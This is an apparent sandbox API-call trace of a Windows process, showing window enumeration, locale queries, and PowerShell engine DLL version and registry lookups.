	[0432.708] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xd30
	[0432.708] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xe70
	[0432.708] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x13b8
	[0432.708] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xe20
	[0432.708] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xe2c
	[0432.708] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xe00
	[0432.708] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xe04
	[0432.709] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xc94
	[0432.709] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x13b0
	[0432.709] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x13ac
	[0432.709] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x13a8
	[0432.709] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x1374
	[0432.709] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x132c
	[0432.709] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x1328
	[0432.709] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x12d0
	[0432.709] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x12cc
	[0432.709] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x12c8
	[0432.709] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x1290
	[0432.709] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x1218
	[0432.709] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x1214
	[0432.710] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x11ec
	[0432.710] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x11e8
	[0432.710] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x11cc
	[0432.710] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x1140
	[0432.710] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xe6c
	[0432.710] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x6e8
	[0432.710] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xc6c
	[0432.710] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xf94
	[0432.710] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xffc
	[0432.710] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xf74
	[0432.710] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xf08
	[0432.710] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xf0c
	[0432.711] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xed8
	[0432.711] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xe90
	[0432.711] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xea8
	[0432.711] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xfa8
	[0432.711] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xfbc
	[0432.711] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xfb8
	[0432.711] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xfb4
	[0432.711] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xfb0
	[0432.711] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xfac
	[0432.711] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xfc0
	[0432.711] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xfd0
	[0432.711] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xf88
	[0432.711] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xf84
	[0432.712] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xf80
	[0432.712] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xde0
	[0432.712] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xddc
	[0432.712] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xdd8
	[0432.712] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xd34
	[0432.712] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xd10
	[0432.712] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xd0c
	[0432.712] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xc9c
	[0432.712] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xc74
	[0432.712] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xc1c
	[0432.712] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xc08
	[0432.712] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xabc
	[0432.713] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x24c
	[0432.713] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xbb0
	[0432.713] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xbfc
	[0432.713] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xb10
	[0432.713] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x374
	[0432.713] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x368
	[0432.713] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xb28
	[0432.713] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xae8
	[0432.713] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xb14
	[0432.713] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x95c
	[0432.713] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xa8c
	[0432.713] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x46c
	[0432.714] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xb3c
	[0432.714] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xa90
	[0432.714] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xad0
	[0432.714] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xa9c
	[0432.714] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xaa0
	[0432.714] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xb1c
	[0432.714] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x7e0
	[0432.714] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xa74
	[0432.714] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x694
	[0432.714] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0xa28
	[0432.715] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x9b0
	[0432.715] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x8d8
	[0432.715] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x940
	[0432.715] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x93c
	[0432.715] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x4ec
	[0432.715] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x12dc60 | out: lpdwProcessId=0x12dc60) returned 0x150
	[0432.719] WerSetFlags () returned 0x0
	[0432.728] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0433.257] CoTaskMemFree (pv=0x0) 
	[0433.258] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12dfc8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12dfc0 | out: pulNumLanguages=0x12dfc8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12dfc0) returned 1
	[0433.258] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12dfc8, pwszLanguagesBuffer=0x2cc1090, pcchLanguagesBuffer=0x12dfc0 | out: pulNumLanguages=0x12dfc8, pwszLanguagesBuffer=0x2cc1090, pcchLanguagesBuffer=0x12dfc0) returned 1
	[0433.264] CoTaskMemAlloc (cb=0x24) returned 0x394d20
	[0433.264] GetUserDefaultLocaleName (in: lpLocaleName=0x394d20, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0433.264] CoTaskMemFree (pv=0x394d20) 
	[0433.290] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0433.290] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0433.290] CoTaskMemFree (pv=0x2eaa90) 
	[0433.293] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0433.293] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0433.293] CoTaskMemFree (pv=0x2eaa90) 
	[0433.755] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0433.755] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0433.755] CoTaskMemFree (pv=0x2eaa90) 
	[0433.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0433.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12da30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0433.765] SetErrorMode (uMode=0x1) returned 0x1
	[0433.766] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x12dc40 | out: lpFileInformation=0x12dc40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0433.766] SetErrorMode (uMode=0x1) returned 0x1
	[0433.766] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x12deb0 | out: lpdwHandle=0x12deb0) returned 0x94c
	[0433.767] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cc4920 | out: lpData=0x2cc4920) returned 1
	[0433.768] VerQueryValueW (in: pBlock=0x2cc4920, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12de28, puLen=0x12de20 | out: lplpBuffer=0x12de28*=0x2cc49bc, puLen=0x12de20) returned 1
	[0433.768] VerQueryValueW (in: pBlock=0x2cc4920, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x12dd98, puLen=0x12dd90 | out: lplpBuffer=0x12dd98*=0x2cc4a98, puLen=0x12dd90) returned 1
	[0433.768] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0433.768] CoTaskMemAlloc (cb=0x2e) returned 0x39eb00
	[0433.768] lstrcpyW (in: lpString1=0x39eb00, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0433.768] CoTaskMemFree (pv=0x39eb00) 
	[0433.768] VerQueryValueW (in: pBlock=0x2cc4920, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x12dd98, puLen=0x12dd90 | out: lplpBuffer=0x12dd98*=0x2cc4aec, puLen=0x12dd90) returned 1
	[0433.768] lstrlenW (lpString="System.Management.Automation") returned 28
	[0433.768] CoTaskMemAlloc (cb=0x3c) returned 0x39d9d0
	[0433.768] lstrcpyW (in: lpString1=0x39d9d0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0433.768] CoTaskMemFree (pv=0x39d9d0) 
	[0433.768] VerQueryValueW (in: pBlock=0x2cc4920, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x12dd98, puLen=0x12dd90 | out: lplpBuffer=0x12dd98*=0x2cc4b48, puLen=0x12dd90) returned 1
	[0433.768] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0433.768] CoTaskMemAlloc (cb=0x20) returned 0x39aac0
	[0433.768] lstrcpyW (in: lpString1=0x39aac0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0433.768] CoTaskMemFree (pv=0x39aac0) 
	[0433.768] VerQueryValueW (in: pBlock=0x2cc4920, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x12dd98, puLen=0x12dd90 | out: lplpBuffer=0x12dd98*=0x2cc4b88, puLen=0x12dd90) returned 1
	[0433.768] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0433.768] CoTaskMemAlloc (cb=0x44) returned 0x39d9d0
	[0433.768] lstrcpyW (in: lpString1=0x39d9d0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0433.768] CoTaskMemFree (pv=0x39d9d0) 
	[0433.768] VerQueryValueW (in: pBlock=0x2cc4920, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x12dd98, puLen=0x12dd90 | out: lplpBuffer=0x12dd98*=0x2cc4bf0, puLen=0x12dd90) returned 1
	[0433.768] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0433.768] CoTaskMemAlloc (cb=0x76) returned 0x33e8b0
	[0433.768] lstrcpyW (in: lpString1=0x33e8b0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0433.768] CoTaskMemFree (pv=0x33e8b0) 
	[0433.768] VerQueryValueW (in: pBlock=0x2cc4920, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x12dd98, puLen=0x12dd90 | out: lplpBuffer=0x12dd98*=0x2cc4c8c, puLen=0x12dd90) returned 1
	[0433.768] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0433.768] CoTaskMemAlloc (cb=0x44) returned 0x39d9d0
	[0433.768] lstrcpyW (in: lpString1=0x39d9d0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0433.769] CoTaskMemFree (pv=0x39d9d0) 
	[0433.769] VerQueryValueW (in: pBlock=0x2cc4920, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x12dd98, puLen=0x12dd90 | out: lplpBuffer=0x12dd98*=0x2cc4cf0, puLen=0x12dd90) returned 1
	[0433.769] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0433.769] CoTaskMemAlloc (cb=0x58) returned 0x2e5ee0
	[0433.769] lstrcpyW (in: lpString1=0x2e5ee0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0433.769] CoTaskMemFree (pv=0x2e5ee0) 
	[0433.769] VerQueryValueW (in: pBlock=0x2cc4920, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x12dd98, puLen=0x12dd90 | out: lplpBuffer=0x12dd98*=0x2cc4d6c, puLen=0x12dd90) returned 1
	[0433.769] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0433.769] CoTaskMemAlloc (cb=0x20) returned 0x39aac0
	[0433.769] lstrcpyW (in: lpString1=0x39aac0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0433.769] CoTaskMemFree (pv=0x39aac0) 
	[0433.769] VerQueryValueW (in: pBlock=0x2cc4920, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x12dd98, puLen=0x12dd90 | out: lplpBuffer=0x12dd98*=0x2cc4a14, puLen=0x12dd90) returned 1
	[0433.769] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0433.769] CoTaskMemAlloc (cb=0x66) returned 0x399cf0
	[0433.769] lstrcpyW (in: lpString1=0x399cf0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0433.769] CoTaskMemFree (pv=0x399cf0) 
	[0433.769] VerQueryValueW (in: pBlock=0x2cc4920, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x12dd98, puLen=0x12dd90 | out: lplpBuffer=0x12dd98*=0x0, puLen=0x12dd90) returned 0
	[0433.769] VerQueryValueW (in: pBlock=0x2cc4920, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x12dd98, puLen=0x12dd90 | out: lplpBuffer=0x12dd98*=0x0, puLen=0x12dd90) returned 0
	[0433.769] VerQueryValueW (in: pBlock=0x2cc4920, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x12dd98, puLen=0x12dd90 | out: lplpBuffer=0x12dd98*=0x0, puLen=0x12dd90) returned 0
	[0433.769] VerQueryValueW (in: pBlock=0x2cc4920, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12dd68, puLen=0x12dd60 | out: lplpBuffer=0x12dd68*=0x2cc49bc, puLen=0x12dd60) returned 1
	[0433.769] CoTaskMemAlloc (cb=0x204) returned 0x334800
	[0433.769] VerLanguageNameW (in: wLang=0x0, szLang=0x334800, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0433.769] CoTaskMemFree (pv=0x334800) 
	[0433.769] VerQueryValueW (in: pBlock=0x2cc4920, lpSubBlock="\\", lplpBuffer=0x12ddb8, puLen=0x12ddb0 | out: lplpBuffer=0x12ddb8*=0x2cc4948, puLen=0x12ddb0) returned 1
	[0433.777] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0433.777] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0433.777] CoTaskMemFree (pv=0x2eaa90) 
	[0433.778] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0433.778] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0433.778] CoTaskMemFree (pv=0x2eaa90) 
	[0433.784] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12dc88 | out: phkResult=0x12dc88*=0x2fc) returned 0x0
	[0433.784] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x12dc78 | out: phkResult=0x12dc78*=0x300) returned 0x0
	[0433.784] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12dd08 | out: phkResult=0x12dd08*=0x304) returned 0x0
	[0433.787] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12dc4c, lpData=0x0, lpcbData=0x12dc48*=0x0 | out: lpType=0x12dc4c*=0x1, lpData=0x0, lpcbData=0x12dc48*=0x56) returned 0x0
	[0433.788] CoTaskMemAlloc (cb=0x5a) returned 0x399c80
	[0433.788] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12dc1c, lpData=0x399c80, lpcbData=0x12dc18*=0x56 | out: lpType=0x12dc1c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12dc18*=0x56) returned 0x0
	[0433.788] CoTaskMemFree (pv=0x399c80) 
	[0434.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0434.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0434.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0434.977] CoTaskMemAlloc (cb=0x104) returned 0x2eaa90
	[0434.977] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaa90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0434.977] CoTaskMemFree (pv=0x2eaa90) 
	[0437.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0437.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0438.300] CoTaskMemAlloc (cb=0x104) returned 0x2eaba0
	[0438.300] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2eaba0, nSize=0x80 | out: lpBuffer="") returned 0x0
